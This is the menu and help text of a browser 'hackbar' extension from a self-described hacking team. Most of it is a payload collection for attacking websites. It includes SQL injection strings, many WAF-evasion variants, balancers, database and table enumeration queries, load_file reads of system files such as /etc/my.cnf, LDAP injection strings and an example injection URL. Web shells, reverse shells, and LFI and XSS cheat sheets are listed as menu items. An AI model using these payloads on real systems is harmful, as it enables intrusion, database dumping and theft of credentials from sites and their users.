WELCOME TO 313 HACKBAR

Made By Hacker Al-Imamah 313

What's new?

×

SQL Basic

  • Convert Statement
    • Convert using UTF-8
    • CAST()
    • unhex(hex(verion()))
    • uncompress(compress(version()))
    • binary(verion())
    • aes_decrypt(aes_encrypt(verion(),1),1)
    • reverse(tacnoc)
    • CONVERT USING ascii
    • substring(value,1,1)
      • substring(concat(value),1,1)=4
      • substring(concat(value),1,1)=5
      • substring(concat(value),1,1)=9
      • substring(concat(value),1,1)=10
    • CONVERT(concat(value),binary)
    • CHAR()
      • MySQL CHAR()
      • MsSQL CHAR()
      • Oracle CHAR()
    • Replace White String
      • +
      • /**/
      • Clear
    • System Variable
      • MySQL
        • VERSION
          • VERSION()
          • @@VERSION
          • @@GLOBAL.VERSION
          • @@VERSION_COMMENT
        • USER
          • USER()
          • CURRENT_USER()
          • SYSTEM_USER()
          • SESSION_USER()
          • SUBSTRING @
          • FROM PROCESSLIST
        • DATABASE
          • DATABASE()
          • SCHEMA()
          • FROM PROCESSLIST
        • Get Server Folders
          • CHARSETS FOLDER
          • ERROR LOG LOCATION
          • LANGUAGE DATADIR
          • PIT FILE
          • PLUGIN DIR
          • SOCKET DIR
          • SQL BASEDIR
          • SQL DATADIR
          • TEMP DIR
        • CHARSET
          • CHARSET CLIENT
          • CHARSET CONNECTION
          • CHARSET DATABASE
          • CHARSET FILESYSTEM
          • CHARSET SERVER
        • CASE INTENSIV TABLES
        • CASE INTENSIV SYSTEM
        • COLLATION SET
        • HOSTNAME
        • INNODB
        • OPERATORS
        • PORT SQL
        • RECOVER OPTIONS
        • SERVER OS
        • SERVER OS TYPE
        • SSL OPEN
        • SYMLINK
        • TIMEOUT CONNECTION
        • TIMEOUT WAIT
    • Other
      • LPAD()
      • REPEAT()
      • IF statement
      • CASE WHEN THEN
×

UNION BASED

  • Coulumn Count
    • ORDER BY
    • +ORDER+BY+
    • GROUP BY
    • +GROUP+BY+
    • PROCEDURE ANALYSE()
    • (SELECT * FROM *)=(SELECT 1)
  • Union Statement
    • Union Select 1,2,3,4,5
    • UNION+SELECT+1,2,3,4,5
    • UNION+All+SELECT+1,2,3,4,5
    • UNION+ALL+SELECT null,null,null
    • UNION(SELECT(1),(2),(3),(4),(5))
    • Union Distinctrow Select 1,2,3,4,5
    • Union Select 13371,13372,13373
    • Union Select 1%2c2%2c3%2c4%2c5
    • Union Select 1–+%0A,2–+%0A,3–+%0A
    • Union Select ~1,~2,~3,~4,~5
    • Union Select .1,.2,.3,.4,.5
    • Union Select '1','2','3','4','5'
    • Union Select 1111,2222,3333
      • Union Select 1111,2222,3333
      • UNION(SELECT(1111),(2222),(3333)
      • Union Select * from join(SELECT 1111)a...
    • Union Select CHAR(49),CHAR(50),CHAR(51)
    • join(SELECT 1)a join(SELECT 2)b join(SELECT 3)c
    • %23%0AUnion%23aaaaaaaaaaaaaaaaa%0ASelect%23%0A
  • Local Dios
    • LOCAL DIOS 1
    • LOCAL DIOS 2
    • LOCAL DIOS 3
    • LOCAL DIOS 4
    • LOCAL DIOS 5
    • LOCAL DIOS 6
    • LOCAL DIOS 7
    • LOCAL DIOS 8
    • LOCAL DIOS 9
    • LOCAL DIOS 10
    • LOCAL DIOS 11
  • Local Variable Dios
    • Local Dios
      • LOCAL DIOS 1
      • LOCAL DIOS 2
      • LOCAL DIOS 3
      • LOCAL DIOS 4
      • LOCAL DIOS 5
      • LOCAL DIOS 6
      • LOCAL DIOS 7
      • LOCAL DIOS 8
      • LOCAL DIOS 9
      • LOCAL DIOS 10
      • LOCAL DIOS 11
      • LOCAL DIOS 12
    • Password Dump
      • Data One Shot
      • Data Second Shot
      • Data Third Shot
  • Basic Statement
    • USER(),DATABASE(),VERSION()Basic statements
    • Count() DATABASES
    • Privileges check
      • via I_S.PRIVILEGES
      • via MySQL SYSTEM TABLE
    • Get running query
  • Databases
    • DATABASE_NAMES group_concat()
    • DATABASE_NAMES one shot
    • DATABASE_NAME From Table Name
    • DATABASE_NAME From Table Name Waf
  • Tables
    • TABLE_NAMES
    • TABLE_NAMES one shot
    • TABLE Name Count
  • Coulumns
    • COLUMN_NAMES group_concat()
    • COLUMN_NAMES one shot
  • Data
    • DATA group_concat()
    • DATA one shot
    • DATA second shot
    • DATA third shot
  • join method
    • Join Method by FabiHaXorJoin Method
  • Dios MySQL
    • DIOS SET 1
      • DIOS by Bla3l_D3vil
      • DIOS by AL!3N 6M3 (waf)
      • DIOS by Alien
      • DIOS by MCS waf
      • DIOS by Cobra waf
      • DIOS by Madblood
      • DIOS by M@dBl00d
      • DIOS by Mr.Silent coder
      • DIOS by T-ProT-Pro
      • DIOS by Dr.Z3r0
      • DIOS by Zen
      • DIOS by MakMan
      • DIOS by tr0jan WAF
      • DIOS by Madblood WAF
      • DIOS by Madblood WAF @x
      • DIOS by tr0jan Benchmark
      • DIOS by r0ot@h3x49
      • DIOS Using Replace
      • DIOS by MakMan WAF
      • DIOS by Ajkaro
      • DIOS by Zen WAF
    • DIOS SET 2
      • DIOS by Zen_1
      • DIOS WAF
      • DIOS by Rummy
      • DIOS by Shariq
      • DIOS by H3LL4R_H5H
      • DIOS by Harsha Haxor
      • DIOS by Dhani
      • DIOS by Rahul R@Z
      • DIOS by DHANI (WAF)
      • DIOS by Sec7or Team
      • DUMP Lokomedia
      • DIOS by R3yz3
      • DIOS by Profexer
      • DIOS 403 - T&C
      • DIOS 403 - U&P
      • DIOS by SKIDROW 1
      • DIOS by SKIDROW 2
      • DIOS by SKIDROW 3
      • DIOS by SKIDROW 4
      • DIOS by SKIDROW 5
    • DIOS SET 3
      • DIOS by SKIDROW 6
      • DIOS by SKIDROW 7
      • DIOS by SKIDROW 8
      • DIOS by SKIDROW 9
      • DIOS by SKIDROW 10
      • DIOS by SKIDROW 11
      • DIOS by SKIDROW 12
      • DIOS by Ahmed with xss
      • DIOS by Ahmed SQL + Xss
      • Dios by Ahmed without Hex
      • Eror Base Dios After Parmet
      • Expo Method On Vul. Col
      • Logical variable Dios
      • DIOS By An0n 3xPloiTeRAn0n
      • DIOS By Exorcism 1
      • DIOS By Exorcism 2
      • DIOS Using DUMP_CARD NUMBER
      • DIOS Using MID SEPARATOR
      • DIOS Using Reverse
      • DIOS Using Benchmark
  • Dios PostgreSQL
    • FOR POSTGRE 8.4 Postgre
    • FOR POSTGRE 9.1Postgre
    • ALL VERSIONPostgre
  • Dios MsSQL
    • DIOS by Rummy / Zen MSSQL
  • Varible Methods
    • DB Names
    • DB Count
    • Primary DB Tables Count
    • Primary DB Columns Count
    • InfoSchema Tables Count
    • InfoSchema Columns Count
×

OUT FILE

  • File Privileges
  • Find Root Permission
  • Find Server Dir ( id[]=1 )
  • Load File
    • load_file('/etc/my.cnf')
    • load_file('/etc/group')
    • load_file('/etc/services')
    • load_file('/etc/hosts')
    • load_file('/etc/httpd/conf/httpd.conf')
  • INTO OUTFILE
  • VIEW SOURCE
  • Mics. Script
    • Block Shell Backdoor
  • PHP Shells
    • WSO shell
    • c99 Shell
    • b374k mini shell
    • mini shell
    • ssi shell
    • An0n 3xPloiTeR Shell
    • An0n 3xPloiTeR Mini
    • Wget System
      • WGET system (WSO Shells)
      • WGET exec (WSO Shells)
      • WGET shell_exec (WSO Shells)
      • WGET passthru (WSO Shells)
    • PHP SHELL by ALIEN
      • PHP SHELL
        • WSO SHELL TXT
        • INDOXPLOIT SHELL TXT
        • ALFA 3.0 SHELL TXT
        • R57 SHELL TXT
        • R57 SHELL TXT
      • ASP SHELL
        • ASP WEB SHELL TXT
        • EL-YOFRO SHELL TXT
        • KACAK SHELL TXT
        • ASP CMD SHELL TXT
        • POUYA SHELL TXT
      • SHTML SHELL
        • SHTML SHELL TXT
  • PHP Script
    • PHP Reverse Shell (Bash)
    • PHP RFI
    • Node.js Reverse Shell
    • Uploader Script (0xHex)
    • Tiny Shell (0xHex By Rahul Raz)
    • Uploader (LFI)
    • 404 Uploader (LFI by Ph.Hitachi)
    • @fwrite/fopen with phpinfo()
    • fwrite/fopen (WSO shell)
    • fwrite/fopen (txt)
    • ${@fwrite/fopen}
    • CMD script (0xHex)
    • CMD php script (GET)
    • CMD php script (POST)
    • CMD base64 (GET)
    • CMD eval (REQUEST)
    • CMD eval (GET)new
    • CMD eval (POST)new
    • CMD eval (BASE64(GET))new
    • CMD eval (BASE64(POST))new
    • PHPINFO()
  • Writable Path
    • Linux
      • /var/www/...
      • /var/www/...
      • /var/www/...
      • /var/www/...
      • /var/www/...
      • /etc/init.d/...
      • /etc/httpd/...
      • /etc/apache/...
      • /etc/apache/...
      • /etc/apache2/...
      • /etc/apache2/...
      • /usr/local/...
      • /usr/local/...
      • /opt/apache/...
      • /home/apache/...
      • /home/apache/...
      • /etc/apache2/...
      • /etc/apache2/...
      • /templates_compiled/
      • /templates_c/
      • /temporary/
      • /images/
      • /files/
      • /temp/
      • /etc/httpd/conf/httpd.conf
    • Windows
      • C:/XAMPP/...
      • C:/AppServ/...
      • C:/XAMPP/...
      • C:/AppServ/...
      • C:/wamp/...
      • C:/wamp/...
      • C:/Program Files/Ampps/...
      • C:/Program Files (x86)/Ampps/...
×

WAF BASED

  • Order by
    • /**/ORDER/**/BY/**/
    • /*!order*/+/*!by*/
    • /*!ORDER BY*/
    • /*!50000ORDER*//**//*!50000BY*/
    • /*!12345ORDER*/+/*!BY*/
    • /*!50000ORDER BY*/
    • /**/**/ORDER/**/BY/**/**/
    • order/**_**/by
  • Union Select
    • UNION TAB 1
      • /*!50000%55nIoN*/ /*!50000%53eLeCt*/
      • %55nion(%53elect 1,2,3)
      • +union+distinct+select+
      • +union+distinctROW+select+
      • + #?uNiOn + #?sEleCt
      • + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
      • /*!%55NiOn*/ /*!%53eLEct*/
      • +un/**/ion+se/**/lect
      • UNION/*&test=1*/SELECT/*&pwn=2*/
      • +?UnI?On?+'SeL?ECT?
      • +(UnIoN)+(SelECT)+
      • +(UnI)(oN)+(SeL)(EcT)
      • +UnIoN/*&a=*/SeLeCT/*&a=*/
      • +uni>on+sel>ect+
      • %55nion(%53elect 1,2,3)-- -
      • /**//*!12345UNION SELECT*//**/
      • /**//*!50000UNION SELECT*//**/
      • /**/UNION/**//*!50000SELECT*//**/
      • /*!50000UniON SeLeCt*/
      • union /*!50000%53elect*/
    • UNION TAB 2
      • + #?uNiOn + #?sEleCt
      • + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
      • /*!%55NiOn*/ /*!%53eLEct*/
      • /*!u%6eion*/ /*!se%6cect*/
      • +un/**/ion+se/**/lect
      • uni%0bon+se%0blect
      • %2f**%2funion%2f**%2fselect
      • union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
      • REVERSE(noinu)+REVERSE(tceles)
      • /*--*/union/*--*/select/*--*/
      • union (/*!/**/ SeleCT */ 1,2,3)
      • /*!union*/+/*!select*/
      • union+/*!select*/
      • /**/union/**/select/**/
      • /**/uNIon/**/sEleCt/**/
      • +%2F**/+Union/*!select*/
      • /**//*!union*//**//*!select*//**/
      • /*!uNIOn*/ /*!SelECt*/
      • uNiOn aLl sElEcT
      • UNIunionON+SELselectECT
    • UNION TAB 3
      • /**/union/*!50000select*//**/
      • 0%a0union%a0select%09
      • %0Aunion%0Aselect%0A
      • %55nion/**/%53elect
      • uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
      • %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
      • %0A%09UNION%0CSELECT%10NULL%
      • /*!union*//*--*//*!all*//*--*//*!select*/
      • union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
      • /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
      • +UnIoN/*&a=*/SeLeCT/*&a=*/
      • union+sel%0bect
      • +uni*on+sel*ect+
      • +#1q%0Aunion all#qa%0A#%0Aselect
      • union(select (1),(2),(3),(4),(5))
      • UNION(SELECT(column)FROM(table))
      • %23xyz%0AUnIOn%23xyz%0ASeLecT+
      • %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
      • union(select(1),2,3)
      • union (select 1111,2222,3333)
    • UNION TAB 4
      • uNioN (/*!/**/ SeleCT */ 11)
      • union (select 1111,2222,3333)
      • +#1q%0AuNiOn all#qa%0A#%0AsEleCt
      • /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
      • %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
      • +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
      • +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
      • /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
      • +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
      • /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
      • /union\sselect/g
      • /union\s+select/i
      • /*!UnIoN*/SeLeCT
      • +UnIoN/*&a=*/SeLeCT/*&a=*/
      • +uni>on+sel>ect+
      • +(UnIoN)+(SelECT)+
      • +(UnI)(oN)+(SeL)(EcT)
      • +?UnI?On?+'SeL?ECT?
      • +uni on+sel ect+
      • +/*!UnIoN*/+/*!SeLeCt*/+
    • UNION TAB 5
      • /*!u%6eion*/ /*!se%6cect*/
      • uni%20union%20/*!select*/%20
      • union%23aa%0Aselect
      • /**/union/*!50000select*/
      • /^****union.*$/ /^****select.*$/
      • /*union*/union/*select*/select+
      • /*uni X on*/union/*sel X ect*/
      • +un/**/ion+sel/**/ect+
      • +UnIOn%0d%0aSeleCt%0d%0a
      • UNION/*&test=1*/SELECT/*&pwn=2*/
      • un?+un/**/ion+se/**/lect+
      • +UNunionION+SEselectLECT+
      • +uni%0bon+se%0blect+
      • %252f%252a*/union%252f%252a /select%252f%252a*/
      • /%2A%2A/union/%2A%2A/select/%2A%2A/
      • %2f**%2funion%2f**%2fselect%2f**%2f
      • union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
      • /*!UnIoN*/SeLecT+
      • /*!50000UnION*//*!50000SeLeCt*/
      • ')AnD null UNiON SeLeCt 1,2,3,4,5;%00
      • ')AnD null UNiON SeLeCt 1,2,3,4,5+--+
      • ' And True Union Select 1,2,3;%00
      • ' And False Union Select 1,2,3;%00
      • ' And True Union Select 1,2,3+--+
      • ' And False Union Select 1,2,3+--+
  • Concat
    • CoNcAt()
    • CON%08CAT()
    • %0AcOnCat()
    • /**//*!12345cOnCat*/
    • /*!50000cOnCat*/(/*!*/)
    • unhex(hex(concat(table_name)))
    • unhex(hex(/*!12345concat*/(table_name)))
    • unhex(hex(/*!50000concat*/(table_name)))
  • Group Concat
    • /*!group_concat*/()
    • gRoUp_cOnCAt()
    • group_concat(/*!*/)
    • group_concat(/*!12345table_name*/)
    • group_concat(/*!50000table_name*/)
    • /*!group_concat*/(/*!12345table_name*/)
    • /*!group_concat*/(/*!50000table_name*/)
    • /*!12345group_concat*/(/*!12345table_name*/)
    • /*!50000group_concat*/(/*!50000table_name*/)
    • /*!GrOuP_ConCaT*/()
    • /*!12345GroUP_ConCat*/()
    • /*!50000gRouP_cOnCaT*/()
    • /*!50000Gr%6fuP_c%6fnCAT*/()
    • unhex(hex(group_concat(table_name)))
    • unhex(hex(/*!group_concat*/(/*!table_name*/)))
    • unhex(hex(/*!12345group_concat*/(table_name)))
    • unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
    • unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
    • unhex(hex(/*!50000group_concat*/(table_name)))
    • unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
    • unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
    • convert(group_concat(table_name)+using+ascii)
    • convert(group_concat(/*!table_name*/)+using+ascii)
    • convert(group_concat(/*!12345table_name*/)+using+ascii)
    • convert(group_concat(/*!50000table_name*/)+using+ascii)
    • CONVERT(group_concat(table_name)+USING+latin1)
    • CONVERT(group_concat(table_name)+USING+latin2)
    • CONVERT(group_concat(table_name)+USING+latin3)
    • CONVERT(group_concat(table_name)+USING+latin4)
    • CONVERT(group_concat(table_name)+USING+latin5)
  • Polygon
    • +div+0
    • div false
    • Having 1=0
    • having false
    • and false
    • and null
    • AND 1=0
    • and(1)=(0)
    • and (1)!=(0)
    • and 2>3
    • %26%26 null
    • and point(29,9)
    • and mod(9,4)
    • and power(5,5)
    • and Radians(point(53,12))
    • and polygon(point(53,12))
    • Multipolygon(point(53,12))
    • Linestring(point(53,12))
    • Multilinestring(point(53,12))
    • Geometrycollection(point(53,12))
  • Schema
    • /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
    • /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
    • /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
    • /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
    • /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
    • /*!50000frOm*/+/*!50000information_schema*/%252e/**/columns
  • Calculation
    • or 1=1
    • or 0=0
    • or 25-10-5=5
    • or 20-5-5=10
    • or 25-5-5=15
    • or 5*5*1=25
    • or 5*5+5=30
    • Or 1 Less Than 0
  • Balancer
    • FIX TAB 1
      • Integer Based
        • --
        • -- -
        • --+-
        • )--
        • )-- -
        • )--+-
        • ))--
        • ))-- -
        • ))--+-
        • ;%00
        • ) ;%00
        • ));%00
        • %23
        • %60
        • %90
        • and 1=1
        • and '1'='1
        • and (1)=(1
        • php?id=(1) -- -
      • String Based
        • '--+-
        • ')-- -
        • ')--+-
        • '))-- -
        • '))--+-
        • ';%00
        • ');%00
        • '));%00
        • '%23
        • '%60
        • '%90
        • ' and 1=1
        • ' and '1'='1
        • ' and (1)=(1
        • php?id=(1') -- -
      • String Based Double Quotes
        • "-- -
        • "--+-
        • "%23
        • ")-- -
        • ")--+-
        • "))--+-
        • ";%00
        • ") ;%00
        • "));%00
        • "%60
        • "%90
        • " and 1=1
        • " and '1'='1
        • " and (1)=(1
        • php?id=(1") -- -
    • FIX TAB 2
      • /*
      • --/*
      • \\--+
      • \\-- +
      • #--+
      • #-- -
      • --++
      • +--+
      • '))%23
      • a'))%60
      • '));%00
      • ');%00
      • ')order by 10;%00
    • FIX TAB 3
      • AND'1
      • or'1
      • AND1='1
      • and 1=0
      • ') and true
      • ') and false
      • ') or true
      • ') or false
      • ' and true
      • ' and false
      • ' or true
      • ' or false
      • and x(point(0,0)) -- -
×

CUSTOM

  • CUSTOM DIOS (10 Slots)
  • CUSTOM XSS (10 Slots)
  • CUSTOM QUERY (10 Slots)
×

ERROR/DOUBLE QUERY

  • Error Based
  • XPATH EXTRACTVALUE
  • XPATH UPDATEXML
  • POLYGON / MULTIPOINT
  • MULTIPOINT DIOS
  • Advance Error based (MySQL >=5.5)
  • Dios by MadBlood (MySQL >=5.5)
  • Double Query Based
  • MSSQL ERRORBASED
×

TOOLS

  • Admin Bypass Queries
  • ADMIN PANEL LINK
  • 2K SQLI DORKS
  • Find injection type
×

WAF BYPASS

  • WAF SET 1
    • /*!_STRING_*/
    • /^.*_STRING_.*$/
    • /*!51000_STRING_*/
    • /*!50000_STRING_*/
    • /*!12345_STRING_*/
    • /*!13337_STRING_*/
    • /*!00000_STRING_*/
    • /*!56000_STRING_*/
    • /*!50095_STRING_*/
    • /*!40122_STRING_*/
    • /*!OverFlow_STRING_*/
    • cutoffCUTOFFWAFwaf
  • WAF SET 2
    • /**/_STRING_/**/
    • +--+_STRING_+--+
    • /*--*/_STRING_/*--*/
    • _STRING_/*&a=*/()
    • _STRING_/*1337*/()
    • _STRING_/**x**/()
    • _STRING_/**_**/()
    • _STRING_/**aaa**/()
  • WAF SET 3
    • %0A_STRING_%0A
    • %0b_STRING_%0b
    • %0d%0A_STRING_%0d%0A
    • %23%0A_STRING_%23%0A
    • %23aa%0A_STRING_%23aa%0A
    • %23xyz%0A_STRING_%23xyz%0A
    • %23foo%0D%0A_STRING_%23foo%0D%0A
    • %23foo*%2F*bar%0D%0A_STRING_%23foo*%2F*bar%0D%0A
    • #qa%0A#%0A_STRING_#qa%0A#%0A
    • /*!20000%0d%0a_STRING_*/
    • /*!blobblobblob%0d%0a_STRING_*/
    • /*!f****U%0d%0a_STRING_*/
  • WAF SETS
×

LDAP FUZZ

  • *
  • *)(&
  • *))%26'
  • *()|&'
  • *(|(mail=*))
  • (|(objectclass=*))
  • *)(uid=*))(|(uid=*
  • */*
  • *|
  • //*
  • @*
  • admin*
  • admin*)((|userpassword=*)
  • x' or name()='username' or 'x'='y
  • %2A%28%7C%28mail%3D%2A%29%29
  • *(|(mail=*))
  • *(|(objectclass=*))
  • x' or name()='username' or 'x'='y
  • admin*)((|userpassword=*)
  • *)(uid=*))(|(uid=*
  • %2A%28%7C%28objectclass%3D%2A%29%29
  • %2A%7C
  • %7C
×

ENCODING

  • BASE64 ENCODE
  • BASE DECODE
  • URL ENCODE
  • URL DECODE
  • HEX ENCODING
  • HEX DECODING
×

0xHTML

  • <br>
  • <br><br>
  • \n
  • Separator <br>
  • <li>
  • <b>
  • </b>
  • <font face=courier>
  • <font color=red>
  • <font color=blue>
  • <font color=green>
  • <font color=purple>
  • <font color=magenta>
  • <font color=custom>
  • </font>
  • <img src=https://yourimagelink.com/image.jpg>
  • <div>
  • </div>
  • <marquee>
  • </marquee>
  • </title>
  • </img>
  • </a>
  • </p>
  • ">
  • '>
  • />
  • "/>
  • -->
×

ENCYPTION

  • MD5 Hash
  • SHA-1 Hash
  • SHA-256 Hash
  • Rot13
×

XSS

  • XSS cheat Sheet 1
  • XSS cheat Sheet 2
  • XSS cheat Sheet 3
  • String.fromCharCode()
  • HTML Character
  • Alert(XSS)
×

LFI

  • FLI cheat Sheet 1
  • FLI cheat Sheet 2
  • FLI fliter
  • FLI Wrapper
  • FLI Wrapper (Base64)
  • RFI Wrapper Expect
  • XSS via LFI payload

Tools

Restore Defaults

Restore Defaults

this can restore in to the defaults style

Export Prerence ( Theme )

Export Prerence ( txt )

1. change the value of color,font,icon etc.

2. goto setting

3. select Export preferences

3. save the preferences

Export Prerence ( Theme )

Import Prerence ( txt )

1. goto setting

2. select Import preferences

3. Select the exported txt preferences

4. Restart your browser

Export Prerence ( Theme )

Export Prerence ( txt )

1. change the value of color,font,icon etc.

2. goto setting

3. select Export preferences

3. save the preferences

Export Prerence ( Theme )

Import Prerence ( txt )

1. goto setting

2. select Import preferences

3. Select the exported json preferences

4. Restart your browser

watch the video to learn in importing preferences

About 313 Team

313 Team or Islamic Cyber ​​Resistance in Iraq (CIRI), The arm responsible for managing the cyber training wing (Liwa Badr) and the software development wing (Liwa Awli Aleazm) of the Islamic Cyber ​​Resistance Axis, A team composed of professional Iraqi hackers and programmers, The Islamic Cyber ​​Resistance in Iraq was founded - 313 Team (June 13, 2023). Hacker Al-Imamah313 - CEO.

WAF BYPASS

Waf Bypass replacing in Space & Parenthesis

Ex: ORDER/**/BY or USER/**/()

Queries Space Parenthesis
/**/ Yes Yes
+--+ Yes No
/*--*/ Yes Yes
/*&a=*/ Yes Yes
/*1337*/ Yes Yes
/**x**/ Yes Yes
/**_**/ Yes Yes
/**aaa**/ Yes Yes
/*!_STRING_*/ Yes No
/^.*_STRING_.*$/ Yes No
/*!51000_STRING_*/ Yes No
/*!50000_STRING_*/ Yes No
/*!12345_STRING_*/ Yes No
/*!13337_STRING_*/ Yes No
/*!00000_STRING_*/ Yes No
/*!56000_STRING_*/ Yes No
/*!50095_STRING_*/ Yes No
/*!40122_STRING_*/ Yes No
%0A Yes Yes
%0b Yes Yes
%0d%0A Yes Yes
%23%0A Yes Yes
%23aa%0A Yes Yes
%23xyz%0A Yes Yes
%23foo%0D%0A Yes Yes
%23foo*%2F*bar%0D%0A Yes Yes
#qa%0A#%0A Yes Yes
/*!20000%0d%0a_STRING_*/ Yes No
/*!blobblobblob%0d%0a_STRING_*/ Yes No
/*!f****U%0d%0a_STRING_*/ Yes No

Base64 spacer

Base64 Spacer automatically decode base64 and add [BASE64=DecodedString]

Base64 Spacer is use to SQLI BASE64 without encode & decode

Example

https://site.com/index.php?id=MTI=

0xHEX

0xHEX is use for print String or text in target website.

Example

localhost/index.php?id=12' Union Select 1,2,3,concat(injected by ph.hitachi),5,6,7,8,9,10-- -

%URL

%URL encode and decode is use for waf bypassing and many more.

Example

localhost/index.php?id=12' Union Select 1,2,3,4,5,6,7,8,9,10-- -

BASE64

BASE64 encode and decode is use for SQLI BASE64 (encode & decode)

Example

http://localhost/index.php?id=MTInIFVuaW9uIFNlbGVjdCAxLDIsMyxjb25jYXQoJ2luamVjdGVkIGJ5IHBoLmhpdGFjaGknKSw1LDYsNyw4LDksMTAtLSAt

0bBINARY

0bBINARY encode and decode is alternative for printing String or text like 0xHEX function

Example

http://localhost/index.php?id=12' Union Select 1,2,3,concat(0b01110000011010000010111001101000011010010111010001100001011000110110100001101001),5,6,7,8,9,10-- -

Customize your hackbar

Customize your hackbar features are added by Ph.Hitachi for the best experience of using hackbar tools for penetration testing and in this hackbar you can edit or modify basic style like color,font,font-style,font-size,border,border-size,border-radius,opacity and also upload custom icon and choose icon.

Color names, hexcodes, rgb(a) and hsl(a) values are supported for image (*.jpg, *.png, *.gif)

Hackbar Field

  • Text-Color
  • Background-Color
  • Border-Top
  • Border-left
  • Border-Bottom
  • Border-Right
  • Border-Size
  • Border-Radius
  • Font-Size
  • Font-Family
  • Font-Style (bold & italic)

Postdata Field

  • Text-Color
  • Background-Color
  • Border-Top
  • Border-left
  • Border-Bottom
  • Border-Right
  • Border-Size
  • Border-Radius
  • Font-Size
  • Font-Family
  • Font-Style (bold & italic)

Referrer Field

  • Text-Color
  • Background-Color
  • Border-Top
  • Border-left
  • Border-Bottom
  • Border-Right
  • Border-Size
  • Border-Radius
  • Font-Size
  • Font-Family
  • Font-Style (bold & italic)

Replace Field

  • Text-Color
  • Background-Color
  • Border-Top
  • Border-left
  • Border-Bottom
  • Border-Right
  • Border-Size
  • Border-Radius
  • Font-Size
  • Font-Family
  • Font-Style (bold & italic)

Menupopup

  • Text-Color
  • Background-Color
  • Border-Top
  • Border-left
  • Border-Bottom
  • Border-Right
  • Border-Size
  • Border-Radius
  • Font-Size
  • Opacity
  • Font-Family
  • Font-Style (bold & italic)

Main Button (load, split, execute)

  • Text-Color
  • Background-Color
  • Border-Top
  • Border-left
  • Border-Bottom
  • Border-Right
  • Border-Size
  • Border-Radius
  • Font-Size
  • Font-Family
  • Font-Style (bold & italic)

Toolbar button (hackbar layout)

  • Text-Color
  • Background-Color
  • Border-Top
  • Border-left
  • Border-Bottom
  • Border-Right
  • Border-Size
  • Border-Radius
  • Font-Size
  • Font-Family
  • Font-Style (bold & italic)

Custom Arrow Icon

Custom arrow icon you can choose icon or upload icon and you can link from online or url.

  • 0xHEX (ENCODE)
  • 0xHEX (DECODE)
  • %URL (ENCODE)
  • %URL (DECODE)
  • BASE64 (ENCODE)
  • BASE64 (DECODE)
  • 0bBINARY (ENCODE)
  • 0bBINARY (DECODE)
  • REPLACE
  • BASE64 SPACER
  • Upload Custom Icon
  • Choose icon

Custom Queries

  • Dios (10 slots)
  • XSS (10 slots)
  • Others (10 slots)

Advance (Hide & Remove Style)

you can hide toolbars for overflow or not compatible resolution and also remove style
note: if you remove style this is not back to previous style.

  • SQLI BASIC
  • UNION BASED
  • OUT FILE
  • WAF BYPASSED
  • CUSTOM
  • ERROR/DOUBLE QUERIES
  • TOOLS
  • WAF BYPASS
  • LDAP FUZZ
  • ENCODING
  • 0xHTML
  • ENCRYTPTION
  • OTHERS
  • XSS
  • LFI
  • LINKS
  • Replace Field